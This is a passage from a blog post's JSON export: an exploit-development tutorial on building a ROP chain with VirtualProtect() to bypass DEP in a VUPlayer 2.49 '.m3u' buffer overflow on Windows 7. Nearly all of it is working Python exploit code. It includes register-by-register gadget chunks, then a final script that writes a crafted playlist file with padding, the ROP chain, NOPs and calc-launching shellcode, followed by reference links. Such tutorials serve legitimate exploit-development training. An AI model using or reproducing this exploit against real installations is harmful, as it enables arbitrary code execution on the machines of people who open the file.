struct.pack(&#8216;&lt;L&#8217;, 
0x10014474)\u00a0\u00a0\u00a0\u00a0#ADD EAX,4 # RETN<br>edx += struct.pack(&#8216;&lt;L&#8217;, 0x10014474)\u00a0\u00a0\u00a0\u00a0#ADD EAX,4 # RETN<br>edx += struct.pack(&#8216;&lt;L&#8217;, 0x10014474)\u00a0\u00a0\u00a0\u00a0#ADD EAX,4 # RETN<br>edx += struct.pack(&#8216;&lt;L&#8217;, 0x10014474)\u00a0\u00a0\u00a0\u00a0#ADD EAX,4 # RETN<br>edx += struct.pack(&#8216;&lt;L&#8217;, 0x10014474)\u00a0\u00a0\u00a0\u00a0#ADD EAX,4 # RETN<br>edx += struct.pack(&#8216;&lt;L&#8217;, 0x10014474)\u00a0\u00a0\u00a0\u00a0#ADD EAX,4 # RETN<br>edx += struct.pack(&#8216;&lt;L&#8217;, 0x10014474)\u00a0\u00a0\u00a0\u00a0#ADD EAX,4 # RETN<br>edx += struct.pack(&#8216;&lt;L&#8217;, 0x10014474)\u00a0\u00a0\u00a0\u00a0#ADD EAX,4 # RETN<br>edx += struct.pack(&#8216;&lt;L&#8217;, 0x10014474)\u00a0\u00a0\u00a0\u00a0#ADD EAX,4 # RETN<br>edx += struct.pack(&#8216;&lt;L&#8217;, 0x10014474)\u00a0\u00a0\u00a0\u00a0#ADD EAX,4 # RETN<br>edx += struct.pack(&#8216;&lt;L&#8217;, 0x10014474)\u00a0\u00a0\u00a0\u00a0#ADD EAX,4 # RETN<br>edx += struct.pack(&#8216;&lt;L&#8217;, 0x10038a6c)\u00a0\u00a0\u00a0\u00a0#XCHG EAX,EDX # RETN\u00a0<br><br># EBX Chunk Affects: EAX, EBX<br>ebx = struct.pack(&#8216;&lt;L&#8217;, 0x10015fe7)     #POP EAX # RETN<br>ebx += struct.pack(&#8216;&lt;L&#8217;, 0x994801bc)\u00a0\u00a0\u00a0\u00a0# once XOR&#8217;d w the static value 994803BD, this will result in 0x201<br>ebx += struct.pack(&#8216;&lt;L&#8217;, 0x1003a074)\u00a0\u00a0\u00a0\u00a0#XOR EAX,994803BD # RETN<br>ebx += struct.pack(&#8216;&lt;L&#8217;, 0x10032f32)\u00a0\u00a0\u00a0\u00a0#XCHG EAX,EBX # RETN 0x00<br><br># EBP Chunk Affects: EBP<br>ebp = struct.pack(&#8216;&lt;L&#8217;, 0x10017c0d)  #POP EBP # RETN 0x04<br>ebp += struct.pack(&#8216;&lt;L&#8217;, 0x1010539F)\u00a0\u00a0\u00a0\u00a0# pointer to JMP ESP<br>ebp += struct.pack(&#8216;&lt;L&#8217;, 0x10101008)\u00a0\u00a0\u00a0\u00a0# pointer to a ROP NOP to compensate for the RETN 0x04<br>ebp += struct.pack(&#8216;&lt;L&#8217;, 
0x10101008)\u00a0\u00a0\u00a0\u00a0# pointer to a ROP NOP to compensate for the RETN 0x04\u00a0<br><br># ESI Chunk Affects: EAX, ESI<br>esi = struct.pack(&#8216;&lt;L&#8217;, 0x10015fe7)\u00a0\u00a0\u00a0\u00a0\u00a0#POP EAX # RETN<br>esi += struct.pack(&#8216;&lt;L&#8217;, 0x1060E25C)\u00a0\u00a0\u00a0\u00a0# virtual protect pointer\u00a0<br>esi += struct.pack(&#8216;&lt;L&#8217;, 0x1001eaf1)\u00a0\u00a0\u00a0\u00a0# a pointer to # MOV EAX,DWORD PTR DS:[EAX] # RETN<br>esi += struct.pack(&#8216;&lt;L&#8217;, 0x10030950)\u00a0\u00a0\u00a0\u00a0# a pointer to # XCHG EAX,ESI # RETN<br><br># EDI Chunk Affects: EDI<br>edi = struct.pack(&#8216;&lt;L&#8217;, 0x100190b0)\u00a0\u00a0\u00a0\u00a0\u00a0#POP EDI # RETN<br>edi += struct.pack(&#8216;&lt;L&#8217;, 0x10101008)\u00a0\u00a0\u00a0\u00a0# pointer to a ROP NOP\u00a0<br><br># PUSHAD Chunk<br>pushad = struct.pack(&#8216;&lt;L&#8217;, 0x1001d7a5)\u00a0\u00a0#PUSHAD # RETN<br><br>&#8230;<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<h3>Final Script for the chain v10<\/h3>\n\n\n\n<p>ebp, edi, eax, and ecx only affect their own registers.<\/p>\n\n\n\n<p>However, edx, esi and ebx also affect eax.<\/p>\n\n\n\n<p>So the chunks that also use eax should come first, so that they do not interfere with each other later.<\/p>\n\n\n\n<ul><li>rop = edx<\/li><li>rop += esi<\/li><li>rop += ebx\u00a0<\/li><li>rop += ebp<\/li><li>rop += edi<\/li><li>rop += eax<\/li><li>rop += ecx<\/li><li>rop += pushad<\/li><\/ul>\n\n\n\n<figure class=\"wp-block-table\"><table><tbody><tr><td>import sys<br>import struct<br>import os\u00a0<br><br>crash_file = &#8220;final.m3u&#8221;\u00a0<br><br># EAX Chunk Affects: EAX<br>eax = struct.pack(&#8216;&lt;L&#8217;, 0x10015fe7) # pointer to # POP EAX # RETN<br>eax += struct.pack(&#8216;&lt;L&#8217;, 0x90909090)\u00a0<br><br># ECX Chunk Affects: ECX<br>ecx = struct.pack(&#8216;&lt;L&#8217;, 0x10601007) # pntr to # POP ECX # RETN<br>ecx += struct.pack(&#8216;&lt;L&#8217;, 0x101053DC)\u00a0\u00a0\u00a0\u00a0# a writable 
pointer\u00a0<br><br># EDX Chunk Affects: EAX, EDX<br>edx = struct.pack(&#8216;&lt;L&#8217;, 0x106074f8)\u00a0\u00a0\u00a0\u00a0 # XOR EAX,EAX # RETN<br>edx += struct.pack(&#8216;&lt;L&#8217;, 0x10014474)\u00a0\u00a0\u00a0\u00a0#ADD EAX,4 # RETN<br>edx += struct.pack(&#8216;&lt;L&#8217;, 0x10014474)\u00a0\u00a0\u00a0\u00a0#ADD EAX,4 # RETN<br>edx += struct.pack(&#8216;&lt;L&#8217;, 0x10014474)\u00a0\u00a0\u00a0\u00a0#ADD EAX,4 # RETN<br>edx += struct.pack(&#8216;&lt;L&#8217;, 0x10014474)\u00a0\u00a0\u00a0\u00a0#ADD EAX,4 # RETN<br>edx += struct.pack(&#8216;&lt;L&#8217;, 0x10014474)\u00a0\u00a0\u00a0\u00a0# ADD EAX,4 # RETN<br>edx += struct.pack(&#8216;&lt;L&#8217;, 0x10014474)\u00a0\u00a0\u00a0\u00a0#ADD EAX,4 # RETN<br>edx += struct.pack(&#8216;&lt;L&#8217;, 0x10014474)\u00a0\u00a0\u00a0\u00a0#ADD EAX,4 # RETN<br>edx += struct.pack(&#8216;&lt;L&#8217;, 0x10014474)\u00a0\u00a0\u00a0\u00a0#ADD EAX,4 # RETN<br>edx += struct.pack(&#8216;&lt;L&#8217;, 0x10014474)\u00a0\u00a0\u00a0\u00a0#ADD EAX,4 # RETN<br>edx += struct.pack(&#8216;&lt;L&#8217;, 0x10014474)\u00a0\u00a0\u00a0\u00a0#ADD EAX,4 # RETN<br>edx += struct.pack(&#8216;&lt;L&#8217;, 0x10014474)\u00a0\u00a0\u00a0\u00a0#ADD EAX,4 # RETN<br>edx += struct.pack(&#8216;&lt;L&#8217;, 0x10014474)\u00a0\u00a0\u00a0\u00a0#ADD EAX,4 # RETN<br>edx += struct.pack(&#8216;&lt;L&#8217;, 0x10014474)\u00a0\u00a0\u00a0\u00a0#ADD EAX,4 # RETN<br>edx += struct.pack(&#8216;&lt;L&#8217;, 0x10014474)\u00a0\u00a0\u00a0\u00a0#ADD EAX,4 # RETN<br>edx += struct.pack(&#8216;&lt;L&#8217;, 0x10014474)\u00a0\u00a0\u00a0\u00a0#ADD EAX,4 # RETN<br>edx += struct.pack(&#8216;&lt;L&#8217;, 0x10014474)\u00a0\u00a0\u00a0\u00a0#ADD EAX,4 # RETN<br>edx += struct.pack(&#8216;&lt;L&#8217;, 0x10038a6c)\u00a0\u00a0\u00a0\u00a0#XCHG EAX,EDX # RETN\u00a0<br><br># EBX Chunk Affects: EAX, EBX<br>ebx = struct.pack(&#8216;&lt;L&#8217;, 0x10015fe7)     #POP EAX # RETN<br>ebx += struct.pack(&#8216;&lt;L&#8217;, 0x994801bc)\u00a0\u00a0\u00a0\u00a0# once XOR&#8217;d 
w the static value 994803BD, this will result in 0x201<br>ebx += struct.pack(&#8216;&lt;L&#8217;, 0x1003a074)\u00a0\u00a0\u00a0\u00a0#XOR EAX,994803BD # RETN<br>ebx += struct.pack(&#8216;&lt;L&#8217;, 0x10032f32)\u00a0\u00a0\u00a0\u00a0#XCHG EAX,EBX # RETN 0x00<br><br># EBP Chunk Affects: EBP<br>ebp = struct.pack(&#8216;&lt;L&#8217;, 0x10017c0d)  #POP EBP # RETN 0x04<br>ebp += struct.pack(&#8216;&lt;L&#8217;, 0x1010539F)\u00a0\u00a0\u00a0\u00a0# pointer to JMP ESP<br>ebp += struct.pack(&#8216;&lt;L&#8217;, 0x10101008)\u00a0\u00a0\u00a0\u00a0# pointer to a ROP NOP to compensate for the RETN 0x04<br>ebp += struct.pack(&#8216;&lt;L&#8217;, 0x10101008)\u00a0\u00a0\u00a0\u00a0# pointer to a ROP NOP to compensate for the RETN 0x04\u00a0<br><br># ESI Chunk Affects: EAX, ESI<br>esi = struct.pack(&#8216;&lt;L&#8217;, 0x10015fe7)\u00a0\u00a0\u00a0\u00a0\u00a0#POP EAX # RETN<br>esi += struct.pack(&#8216;&lt;L&#8217;, 0x1060E25C)\u00a0\u00a0\u00a0\u00a0# virtual protect pointer\u00a0<br>esi += struct.pack(&#8216;&lt;L&#8217;, 0x1001eaf1)\u00a0\u00a0\u00a0\u00a0# a pointer to # MOV EAX,DWORD PTR DS:[EAX] # RETN<br>esi += struct.pack(&#8216;&lt;L&#8217;, 0x10030950)\u00a0\u00a0\u00a0\u00a0# a pointer to # XCHG EAX,ESI # RETN<br><br># EDI Chunk Affects: EDI<br>edi = struct.pack(&#8216;&lt;L&#8217;, 0x100190b0)\u00a0\u00a0\u00a0\u00a0\u00a0#POP EDI # RETN<br>edi += struct.pack(&#8216;&lt;L&#8217;, 0x10101008)\u00a0\u00a0\u00a0\u00a0# pointer to a ROP NOP\u00a0<br><br># PUSHAD Chunk<br>pushad = struct.pack(&#8216;&lt;L&#8217;, 0x1001d7a5)\u00a0\u00a0#PUSHAD # RETN<br><br>rop = edx<br>rop += esi<br>rop += ebx\u00a0<br>rop += ebp<br>rop += edi<br>rop += eax<br>rop += ecx<br>rop += pushad\u00a0<br>nops = &#8220;\\x90&#8221; * 16\u00a0<br><br>calc = 
(&#8220;\\x31\\xD2\\x52\\x68\\x63\\x61\\x6C\\x63\\x89\\xE6\\x52\\x56\\x64&#8221;<br>&#8220;\\x8B\\x72\\x30\\x8B\\x76\\x0C\\x8B\\x76\\x0C\\xAD\\x8B\\x30\\x8B&#8221;<br>&#8220;\\x7E\\x18\\x8B\\x5F\\x3C\\x8B\\x5C\\x1F\\x78\\x8B\\x74\\x1F\\x20&#8221;<br>&#8220;\\x01\\xFE\\x8B\\x4C\\x1F\\x24\\x01\\xF9\\x42\\xAD\\x81\\x3C\\x07&#8221;<br>&#8220;\\x57\\x69\\x6E\\x45\\x75\\xF5\\x0F\\xB7\\x54\\x51\\xFE\\x8B\\x74&#8221;<br>&#8220;\\x1F\\x1C\\x01\\xFE\\x03\\x3C\\x96\\xFF\\xD7&#8221;)\u00a0<br><br>fuzz = &#8220;A&#8221; * 1012<br>fuzz += &#8220;\\x08\\x10\\x10\\x10&#8221; # 10101008\u00a0\u00a0&lt;&#8211; Pointer to a RETN<br>fuzz += rop\u00a0<br>fuzz += nops<br>fuzz += calc<br>fuzz += &#8220;C&#8221; * (3000 &#8211; len(fuzz))\u00a0<br><br>file= open(crash_file, &#8220;w&#8221;)<br>file.write(fuzz)<br>file.close()\u00a0<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<figure class=\"wp-block-image size-full\"><img decoding=\"async\" loading=\"lazy\" width=\"1002\" height=\"588\" src=\"https:\/\/areyou1or0.it\/wp-content\/uploads\/2022\/01\/image-11.png\" alt=\"\" class=\"wp-image-180\" srcset=\"https:\/\/areyou1or0.it\/wp-content\/uploads\/2022\/01\/image-11.png 1002w, https:\/\/areyou1or0.it\/wp-content\/uploads\/2022\/01\/image-11-300x176.png 300w, https:\/\/areyou1or0.it\/wp-content\/uploads\/2022\/01\/image-11-768x451.png 768w\" sizes=\"(max-width: 1002px) 100vw, 1002px\" \/><\/figure>\n\n\n\n<h3>Resources: (big thanks to these blogposts)<\/h3>\n\n\n\n<ul><li><a href=\"https:\/\/www.corelan.be\/index.php\/2010\/06\/16\/exploit-writing-tutorial-part-10-chaining-dep-with-rop-the-rubikstm-cube\/\">https:\/\/www.corelan.be\/index.php\/2010\/06\/16\/exploit-writing-tutorial-part-10-chaining-dep-with-rop-the-rubikstm-cube\/<\/a><\/li><li><a href=\"https:\/\/www.fuzzysecurity.com\/tutorials\/expDev\/7.html\">https:\/\/www.fuzzysecurity.com\/tutorials\/expDev\/7.html<\/a><\/li><li><a 
href=\"https:\/\/h0mbre.github.io\/Creating_Win32_ROP_Chains\/#\">https:\/\/h0mbre.github.io\/Creating_Win32_ROP_Chains\/#<\/a><\/li><li><a href=\"https:\/\/www.shogunlab.com\/blog\/2018\/02\/11\/zdzg-windows-exploit-5.html\">https:\/\/www.shogunlab.com\/blog\/2018\/02\/11\/zdzg-windows-exploit-5.html<\/a><\/li><\/ul>\n\n\n\n<p><\/p>\n","protected":false},"excerpt":{"rendered":"<p>We&#8217;ll work on&nbsp;VUPlayer 2.49 (Windows 7) &#8211; &#8216;.m3u&#8217; Local Buffer Overflow (DEP Bypass) for this article Initial exploit v1: EIP Control import sysimport structimport os\u00a0 crash_file\u00a0= &#8220;test.m3u&#8221;\u00a0fuzz\u00a0= &#8220;A&#8221; * 1012fuzz += &#8220;B&#8221; * 4fuzz += &#8220;C&#8221; * (3000 &#8211; len(fuzz))\u00a0 file= open(crash_file, &#8220;w&#8221;)file.write(fuzz)file.close() Start the app and attach to Immunity Drag the m3u file on&hellip; <a class=\"more-link\" href=\"https:\/\/areyou1or0.it\/index.php\/2022\/01\/24\/rop-gadgets-virtualprotect\/\">Continue reading <span class=\"screen-reader-text\">ROP Gadgets: 
VirtualProtect()<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[18],"tags":[],"_links":{"self":[{"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/posts\/168"}],"collection":[{"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/comments?post=168"}],"version-history":[{"count":2,"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/posts\/168\/revisions"}],"predecessor-version":[{"id":182,"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/posts\/168\/revisions\/182"}],"wp:attachment":[{"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/media?parent=168"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/categories?post=168"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/tags?post=168"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}